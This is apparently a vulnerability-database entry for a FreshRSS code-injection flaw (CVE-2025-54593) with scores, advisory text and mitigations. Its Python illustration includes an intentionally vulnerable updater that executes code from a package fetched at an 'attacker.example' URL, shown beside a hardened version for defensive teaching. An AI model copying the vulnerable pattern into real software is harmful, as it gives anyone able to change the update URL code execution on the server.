CVE-2025-54593
Published: 01 August 2025
Summary
CVE-2025-54593 is a high-severity Code Injection (CWE-94) vulnerability in FreshRSS. Its CVSS base score is 7.2 (High).
Operationally, it ranks in the top 15.9% of CVEs by exploit likelihood, is not currently listed in the CISA KEV catalog, and has a referenced public proof-of-concept.
Deeper analysis
FreshRSS, a self-hostable RSS aggregator, contains a code injection vulnerability (CWE-94) in versions 1.26.1 and below. An authenticated administrator can supply a malicious update URL that the application fetches and executes during an update operation, resulting in arbitrary code execution on the server with the privileges of the FreshRSS process.
An attacker who already possesses administrator credentials can therefore exfiltrate hashed passwords and other user data, modify files to deface the instance where permissions allow, or inject further code to capture plaintext credentials on subsequent logins. The attack requires network access to the administrative interface but no other user interaction.
The vulnerability is fixed in FreshRSS 1.26.2. The project's security advisory, release notes, and the referenced commit and pull request describe the patch, which prevents a modified update URL from leading to arbitrary code execution. Until an instance is upgraded, an administrator account should be treated as equivalent to shell access on the host: restrict who holds one and review the configured update URL for unexpected values.
The EPSS score is 0.0202 and has remained flat, with no material increase since disclosure.
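To make the mechanism described above (and restated under Vulnerability details) concrete, here is an added Python sketch of the vulnerable pattern beside a hardened one. It is not FreshRSS code (FreshRSS is written in PHP) and does not reproduce the upstream patch; the settings key `update_url`, the `fetch()` interface, the pinned host `update.example.org`, the digest check and the zip layout are assumptions made for the demonstration. The vulnerable function executes whatever the package at the admin-editable URL contains; the hardened one pins the origin, verifies the package digest, rejects path traversal in archive entries, and never executes code taken from the package.

```python
"""CWE-94 in a self-updater, illustrated: an admin-editable update URL whose
payload the application executes, beside a hardened update path.  Added
example, not FreshRSS code; the settings key, the fetcher interface, the
pinned host and the package layout are assumptions for the demonstration."""
import hashlib
import hmac
import io
import posixpath
import zipfile
from urllib.parse import urlsplit


def make_fetcher(responses):
    """Stand-in for the network so the example runs offline: maps a URL to
    the bytes that server would return (constructed sample data)."""
    def fetch(url):
        if url not in responses:
            raise ConnectionError(f"no route to {url}")
        return responses[url]
    return fetch


def build_package(files):
    """Build an in-memory zip archive used as a sample update package."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in files.items():
            zf.writestr(name, content)
    return buf.getvalue()


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


# --- vulnerable pattern ----------------------------------------------------
def apply_update_vulnerable(settings, fetch):
    """Fetches whatever URL the admin-editable settings hold and runs the
    update script found in the package.  Anyone who can edit
    settings["update_url"] therefore runs code as the application user."""
    package = fetch(settings["update_url"])
    with zipfile.ZipFile(io.BytesIO(package)) as zf:
        script = zf.read("update.py").decode()
    scope = {}
    exec(script, scope)  # CWE-94: attacker-supplied code is executed here
    return scope.get("result")


# --- hardened pattern ------------------------------------------------------
ALLOWED_UPDATE_HOST = "update.example.org"  # assumed pinned release origin


def validate_update_url(url):
    """Accept only https to the pinned host, with no userinfo or odd port."""
    parts = urlsplit(url)
    if parts.scheme != "https":
        raise ValueError("update URL must use https")
    if parts.username is not None or parts.password is not None:
        raise ValueError("credentials are not allowed in the update URL")
    if parts.hostname != ALLOWED_UPDATE_HOST or parts.port not in (None, 443):
        raise ValueError("update URL does not point at the pinned release origin")
    return url


def verify_package(package, expected_sha256):
    """Integrity check against a digest that is not stored next to the URL."""
    if not hmac.compare_digest(sha256_hex(package), expected_sha256):
        raise ValueError("update package digest mismatch")


def safe_member_names(zf):
    """Reject absolute paths, drive letters and '..' traversal before extracting."""
    names = []
    for name in zf.namelist():
        parts = posixpath.normpath(name).split("/")
        if name.startswith("/") or "\\" in name or ".." in parts or ":" in parts[0]:
            raise ValueError(f"unsafe path in package: {name}")
        names.append(name)
    return names


def apply_update_hardened(url, expected_sha256, fetch):
    """URL pinned, package integrity verified, and no code from the package
    is executed: the caller installs the vetted files and runs migration
    logic that shipped with the application itself."""
    validate_update_url(url)
    package = fetch(url)
    verify_package(package, expected_sha256)
    with zipfile.ZipFile(io.BytesIO(package)) as zf:
        return safe_member_names(zf)


if __name__ == "__main__":
    legit = build_package({"app/version.txt": "1.26.2"})
    evil = build_package({"update.py": "result = 'attacker code ran'"})
    fetch = make_fetcher({"https://update.example.org/freshrss.zip": legit,
                          "https://attacker.example/update.zip": evil})
    print(apply_update_vulnerable({"update_url": "https://attacker.example/update.zip"}, fetch))
    print(apply_update_hardened("https://update.example.org/freshrss.zip", sha256_hex(legit), fetch))
    try:
        apply_update_hardened("https://attacker.example/update.zip", sha256_hex(evil), fetch)
    except ValueError as exc:
        print("rejected:", exc)
```

The design point is that a URL setting alone can never be the trust anchor for code that will run on the server: the origin is fixed in the code, the package is checked against a digest (or, better, a signature) the administrator cannot edit through the same interface, and anything executable comes from the already-installed release rather than from the downloaded archive.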
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2025-23380
Vulnerability details
FreshRSS is a free, self-hostable RSS aggregator. In versions 1.26.1 and below, an authenticated administrator user can execute arbitrary code on the FreshRSS server by modifying the update URL to one they control, and gain code execution after running an update. After successfully executing code, user data including hashed passwords can be exfiltrated, and the instance can be defaced when file permissions allow. Malicious code can be inserted into the instance to steal plaintext passwords, among other things. This is fixed in version 1.26.2.
- CWE(s): CWE-94 (Code Injection)
Related Threats
No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.
Affected Assets
Mitigating Controls
Likely Mitigating Controls (AI)
Per-CVE control mapping for this CVE has not run yet; the list below is derived from the weakness types (CWEs) cited in the NVD entry.
- Makes persistent code injection into loaded programs impossible when the executable image itself resides on hardware-protected read-only media.
- Dynamically generated code can be produced and executed inside an isolated chamber, preventing host compromise from code-injection payloads.
- Validates inputs used in dynamic code generation to block injected directives.
- Directly prevents execution of attacker-supplied code written into data memory regions.
Of these generic CWE-94 controls, input validation is the one that corresponds most closely to the upstream fix, since the injected code here is an update package fetched from an administrator-supplied URL and run by the application itself. The read-only-media and non-executable-memory controls target native code and do not address a web application that downloads and executes an update; for this CVE the effective measures are upgrading to 1.26.2, limiting who holds administrator accounts, and sandboxing or restricting the outbound fetches the application can make.